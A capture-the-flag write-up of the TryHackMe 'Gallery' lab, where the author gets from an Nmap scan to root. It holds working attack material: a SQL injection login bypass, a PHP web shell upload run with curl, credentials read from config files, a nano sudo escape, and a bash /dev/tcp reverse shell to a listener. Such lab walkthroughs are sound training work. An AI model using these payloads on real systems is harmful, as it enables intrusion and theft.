Gallery TryHackMe Writeup

### Enumeration First run up Nmap and got two ports open , that is port 80 and port 8080 , and I answer the question, asking about ports. ``` # Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90 Nmap scan report for 10.10.112.90 Host is up (0.36s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 8080/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-title: Simple Image Gallery System | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds ``` Decided to open port 80 on my browser and it gave out apache server homepage : ![](https://i.imgur.com/5czbvHq.png) Now I open up , the other port 8080 , which is a proxy , and it redirects me to `https://ip/gallery/` which has a login page: ![](https://i.imgur.com/YxuBjTg.png) ### Initial Access & Foothold So on the login page, I try SQLi with the payload : `admin ' or 1=1 limit 1-- +'` and I was able to login as administrator : ![](https://i.imgur.com/xZpwPRr.png) Looking around the dashbord I found an upload field on the profile settings, so I uploaded the file captured the request , and then edited the file contents , to a simple web shell: ``` [tahaafarooq@urchinsec-lab gallery]$ curl "http://10.10.118.206/gallery/uploads/1644852240_shell.php?0=id" uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` And now time to pop shell : ![](https://i.imgur.com/qTti3tg.png) Now that I have shell, I decided to look for configuration files, and I found `config.php` but it was importing files from another folder: ```php= <?php ob_start(); ini_set('date.timezone','Asia/Manila'); date_default_timezone_set('Asia/Manila'); session_start(); require_once('initialize.php'); require_once('classes/DBConnection.php'); require_once('classes/SystemSettings.php'); $db = new DBConnection; $conn = $db->conn; ``` I was able to find `DBConnection.php` from `classes` folder and it had the following: ```php= <?php if(!defined('DB_SERVER')){ require_once("../initialize.php"); } class DBConnection{ private $host = DB_SERVER; private $username = DB_USERNAME; private $password = DB_PASSWORD; private $database = DB_NAME; public $conn; public function __construct(){ if (!isset($this->conn)) { $this->conn = new mysqli($this->host, $this->username, $this->password, $this->database); if (!$this->conn) { echo 'Cannot connect to database server'; exit; } } } public function __destruct(){ $this->conn->close(); } } ?> ``` which means the values of those variables are at `initialize.php` ```php= <?php $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>''); if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/"); if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' ); if(!defined('dev_data')) define('dev_data',$dev_data); if(!defined('DB_SERVER')) define('DB_SERVER',"localhost"); if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user"); if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321"); if(!defined('DB_NAME')) define('DB_NAME',"gallery_db"); ?> ``` I was able to get mysql creds , and `$dev_data` information which seem to be creds for the developer , and there was the username and password as hash, I was able to answer number three by login to mysql and then copying the hash for admin! First thing I did, was to update the shell, so as it doesn't give those shell errors : ```= /usr/bin/script -qc /bin/bash /dev/null [click control+z to background the shell] stty raw -echo; fg export TERM=xterm ``` ``` www-data@gallery:/var/backups/mike_home_backup$ /usr/bin/script -qc /bin/bash /dev/null <ome_backup$ /usr/bin/script -qc /bin/bash /dev/null www-data@gallery:/var/backups/mike_home_backup$ ^Z [1]+ Stopped nc -lnvp 1337 [tahaafarooq@urchinsec-lab urchinshell]$ stty raw -echo; fg nc -lnvp 1337 export TERM=xterm ``` I was able to update the shell, and as I was checking through `/var/backups` I was able to see a user's backup folder `mike`, so I read the history, and I was able to get the password: ``` www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history cat .bash_history cd ~ ls ping 1.1.1.1 cat /home/mike/user.txt cd /var/www/ ls cd html ls -al cat index.html sudo -lb[REDACTED]x clear sudo -l exit ``` I log in: ``` www-data@gallery:/var/backups/mike_home_backup$ su mike Password: mike@gallery:/var/backups/mike_home_backup$ cd ~ mike@gallery:~$ ls documents images user.txt mike@gallery:~$ cat user.txt THM{af05[REDACTED]46ef} ``` and there I got the user flag! ### Privilege Escalation I first run `sudo -l` and I got to see what commands can `mike` run as `root`: ``` mike@gallery:~$ sudo -l Matching Defaults entries for mike on gallery: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User mike may run the following commands on gallery: (root) NOPASSWD: /bin/bash /opt/rootkit.sh ``` I read the file `/opt/rootkit.sh`: ```bash= #!/bin/bash read -e -p "Would you like to versioncheck, update, list or read the report ? " ans; # Execute your choice case $ans in versioncheck) /usr/bin/rkhunter --versioncheck ;; update) /usr/bin/rkhunter --update;; list) /usr/bin/rkhunter --list;; read) /bin/nano /root/report.txt;; *) exit;; esac ``` From that code we can see when we choose the option `read` we get to run nano which means we can use nano for privilege escalation: I can easily get root shell here by typing the following: ![](https://i.imgur.com/6bORVhc.png) ``` ^R^X [control+R + control+X] reset; sh 1>&0 2>&0 ``` ![](https://i.imgur.com/T8JDo4f.png) and from here now I can type: ```bash= /bin/bash -c "bash -i &>/dev/tcp/tunip/port <&1" ``` Set a listener on your terminal and boom you have root shell: ``` [tahaafarooq@urchinsec-lab gallery]$ nc -lvnp 1122 Connection from 10.10.170.61:54522 root@gallery:~# id id uid=0(root) gid=0(root) groups=0(root) ``` And we have the flag: ``` root@gallery:/# root cd root root@gallery:/root# ls ls report.txt root.txt root@gallery:/root# cat root.txt cat root.txt THM{ba87e0[REDACTED]fde87} ``` contact : [tahaafarooq](https://twitter.com/tahaafarooq) ---- ![](https://i.imgur.com/kOD5xfq.gif)